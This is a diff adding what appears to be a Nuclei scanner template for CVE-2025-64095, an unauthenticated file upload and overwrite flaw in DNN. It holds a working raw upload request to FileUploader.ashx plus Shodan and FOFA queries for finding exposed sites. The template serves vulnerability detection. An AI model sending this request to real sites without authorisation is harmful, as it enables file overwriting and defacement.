diff --git a/http/cves/2025/CVE-2025-64095.yaml b/http/cves/2025/CVE-2025-64095.yaml
new file mode 100644
index 000000000000..a10f467e516d
--- /dev/null
+++ b/http/cves/2025/CVE-2025-64095.yaml
@@ -0,0 +1,78 @@
+id: CVE-2025-64095
+
+info:
+  name: DNN - Unrestricted Arbitrary File Upload
+  author: DhiyaneshDk,pussycat0x
+  severity: critical
+  description: |
+    DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
+  remediation: |
+    Update to version 10.1.1 or later.
+  reference:
+    - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dnnsoftware
+    product: dotnetnuke
+    shodan-query:
+      - "Set-Cookie: dnn_IsMobile"
+      - http.favicon.hash:-1465479343
+    fofa-query:
+      - app="dotnetnuke"
+      - "Set-Cookie: dnn_IsMobile"
+      - icon_hash="-1465479343"
+  tags: cve,cve2025,intrusive,file-upload,dnn
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3
+
+        --------------------------7RKjWLYyrhvUn2AA31fJQ3
+        Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
+        Content-Type: image/png
+
+        {{randstr}}
+        --------------------------7RKjWLYyrhvUn2AA31fJQ3
+        Content-Disposition: form-data; name="storageFolderID"
+
+        1
+        --------------------------7RKjWLYyrhvUn2AA31fJQ3
+        Content-Disposition: form-data; name="portalID"
+
+        0
+        --------------------------7RKjWLYyrhvUn2AA31fJQ3
+        Content-Disposition: form-data; name="overrideFiles"
+
+        1
+        --------------------------7RKjWLYyrhvUn2AA31fJQ3
+        Content-Disposition: form-data; name="mode"
+
+        Default
+        --------------------------7RKjWLYyrhvUn2AA31fJQ3--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{"group"'
+          - 'delete_type'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200